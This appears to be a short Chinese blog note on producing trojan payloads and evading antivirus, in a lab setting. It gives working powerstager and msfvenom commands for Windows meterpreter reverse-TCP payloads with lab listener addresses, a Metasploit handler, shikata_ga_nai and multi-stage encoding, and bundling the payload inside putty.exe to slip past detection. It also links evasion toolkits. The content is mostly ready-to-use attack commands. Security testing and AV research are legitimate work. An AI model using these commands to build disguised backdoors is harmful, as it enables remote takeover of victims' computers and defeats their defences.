尝试一下传木马到目标机然后用msf监听
powerstger
python powerstager.py -m -t win64 --lhost=192.168.100.103 --lport=4444 -o /tmp/payload.exe
直接使用这个生成一个木马然后使用msfconsole监听
1 | use exploit/multi/handler |
设置了一下必要的参数,
把刚刚与哦那个payload生成的丢虚拟机执行,然后拿到shell
然而没有绕过火绒,直接被拦截了,关了火绒再打得:small_airplane:
还试了一下https://github.com/Veil-Framework/Veil
这个也是直接就被拦截了
msf自带
https://mp.weixin.qq.com/s/A0CZslLhCLOK_HgkHGcpEA
19年的免杀测试,这里记录下命令
1 | #可以查看所有的编码器 |
- 原始免杀
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f exe -o payload1.exe
- msf自编码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -b "\x00" -i 15 -f exe -o payload2.exe
- msf自捆绑免杀
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -x putty.exe -f exe -o payload3.exe
- msf自捆绑+免杀
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -x putty.exe -i 15 -f exe -o payload4.exe
- msf自捆绑多次编码免杀
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=10.211.55.2 LPORT=3333 -f raw | msfvenom -e x86/alpha_upper -i 10 -f raw | msfvenom -e x86/countdown -i 10 -x putty.exe -f exe -o payload5.exe
参考
这个免杀专题用来参考挺好
https://github.com/TideSec/BypassAntiVirus
挖个坑,shelllcodeLoader免杀https://github.com/knownsec/shellcodeloader/blob/master/readme_cn.md